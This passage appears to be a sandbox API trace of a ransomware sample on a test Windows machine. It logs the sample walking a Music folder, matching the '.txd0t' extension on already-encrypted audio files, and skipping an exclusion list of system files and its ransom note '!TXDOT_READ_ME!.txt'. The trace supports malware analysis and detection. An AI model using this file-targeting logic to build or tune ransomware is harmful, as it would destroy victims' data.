lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0119.840] StrCmpW (psz1=".", psz2=".") returned 0 [0119.840] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.840] StrCmpW (psz1="..", psz2=".") returned 1 [0119.840] StrCmpW (psz1="..", psz2="..") returned 0 [0119.840] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d123e3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51d123e3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.840] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.840] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.840] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.840] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.840] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt" [0119.840] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.840] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.840] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.840] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556ab80, ftCreationTime.dwHighDateTime=0x1d5e971, ftLastAccessTime.dwLowDateTime=0x40fcd280, ftLastAccessTime.dwHighDateTime=0x1d5e413, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4854, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="0JKj5_ifBaM.wav.txd0t", cAlternateFileName="0JKJ5_~1.TXD")) returned 1 [0119.840] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2=".") returned 1 [0119.840] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2="..") returned 1 [0119.840] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.840] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.840] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="0JKj5_ifBaM.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t" [0119.840] PathFindExtensionW (pszPath="0JKj5_ifBaM.wav.txd0t") returned=".txd0t" [0119.841] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.841] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d44f7a0, ftCreationTime.dwHighDateTime=0x1d5e4a9, ftLastAccessTime.dwLowDateTime=0x35d78040, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x51d385b1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1215e, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="3MXWb597R4.mp3.txd0t", cAlternateFileName="3MXWB5~1.TXD")) returned 1 [0119.841] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2=".") returned 1 [0119.841] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2="..") returned 1 [0119.841] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="3MXWb597R4.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t" [0119.841] PathFindExtensionW (pszPath="3MXWb597R4.mp3.txd0t") returned=".txd0t" [0119.841] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.841] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b39650, ftCreationTime.dwHighDateTime=0x1d5ed09, ftLastAccessTime.dwLowDateTime=0x7e8f770, ftLastAccessTime.dwHighDateTime=0x1d5ec98, ftLastWriteTime.dwLowDateTime=0x51d5e873, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16214, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="BhtHzSyEfD5ggEidkz.wav.txd0t", cAlternateFileName="BHTHZS~1.TXD")) returned 1 [0119.841] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2=".") returned 1 [0119.841] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2="..") returned 1 [0119.841] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="BhtHzSyEfD5ggEidkz.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t" [0119.841] PathFindExtensionW (pszPath="BhtHzSyEfD5ggEidkz.wav.txd0t") returned=".txd0t" [0119.841] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.841] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f497d20, ftCreationTime.dwHighDateTime=0x1d5e23f, ftLastAccessTime.dwLowDateTime=0xed9388f0, ftLastAccessTime.dwHighDateTime=0x1d5e214, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15b75, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cAlternateFileName="FJIKXU~1.TXD")) returned 1 [0119.841] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2=".") returned 1 [0119.841] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2="..") returned 1 [0119.841] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t" [0119.841] PathFindExtensionW (pszPath="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned=".txd0t" [0119.841] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.841] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe94b7da0, ftCreationTime.dwHighDateTime=0x1d5e446, ftLastAccessTime.dwLowDateTime=0x1b174e50, ftLastAccessTime.dwHighDateTime=0x1d5e92d, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x625d, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="lwEeZe6NJKctwuGef3c.mp3.txd0t", cAlternateFileName="LWEEZE~1.TXD")) returned 1 [0119.841] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2=".") returned 1 [0119.841] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2="..") returned 1 [0119.841] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.841] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="lwEeZe6NJKctwuGef3c.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t" [0119.842] PathFindExtensionW (pszPath="lwEeZe6NJKctwuGef3c.mp3.txd0t") returned=".txd0t" [0119.842] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.842] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05ec6d0, ftCreationTime.dwHighDateTime=0x1d5e424, ftLastAccessTime.dwLowDateTime=0x3cacaa30, ftLastAccessTime.dwHighDateTime=0x1d5eef3, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18443, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="o_54eDamWws3.mp3.txd0t", cAlternateFileName="O_54ED~1.TXD")) returned 1 [0119.842] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", psz2=".") returned 1 [0119.842] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", psz2="..") returned 1 [0119.842] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="o_54eDamWws3.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t" [0119.842] PathFindExtensionW (pszPath="o_54eDamWws3.mp3.txd0t") returned=".txd0t" [0119.842] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.842] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70852950, ftCreationTime.dwHighDateTime=0x1d5ec0e, ftLastAccessTime.dwLowDateTime=0x6056c510, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ce3, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="rWrYpfOfe9_Zr8omah.mp3.txd0t", cAlternateFileName="RWRYPF~1.TXD")) returned 1 [0119.842] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2=".") returned 1 [0119.842] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2="..") returned 1 [0119.842] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.842] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="rWrYpfOfe9_Zr8omah.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t" [0119.842] PathFindExtensionW (pszPath="rWrYpfOfe9_Zr8omah.mp3.txd0t") returned=".txd0t" [0119.842] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.844] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 1 [0119.845] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2=".") returned 1 [0119.845] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2="..") returned 1 [0119.845] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="Wv1ct5mSPlb.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t" [0119.845] PathFindExtensionW (pszPath="Wv1ct5mSPlb.wav.txd0t") returned=".txd0t" [0119.845] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.845] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 0 [0119.845] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0119.845] GetProcessHeap () returned 0xe30000 [0119.845] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.845] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4468cd60, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x5d990a0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x51df71c4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f5, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="W-oOtVbhE3qMz.wav.txd0t", cAlternateFileName="W-OOTV~1.TXD")) returned 1 [0119.845] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2=".") returned 1 [0119.845] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2="..") returned 1 [0119.845] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="W-oOtVbhE3qMz.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t" [0119.845] PathFindExtensionW (pszPath="W-oOtVbhE3qMz.wav.txd0t") returned=".txd0t" [0119.845] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.845] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 1 [0119.845] StrCmpW (psz1="WDCK.m4a.txd0t", psz2=".") returned 1 [0119.845] StrCmpW (psz1="WDCK.m4a.txd0t", psz2="..") returned 1 [0119.845] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0119.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="WDCK.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t" [0119.846] 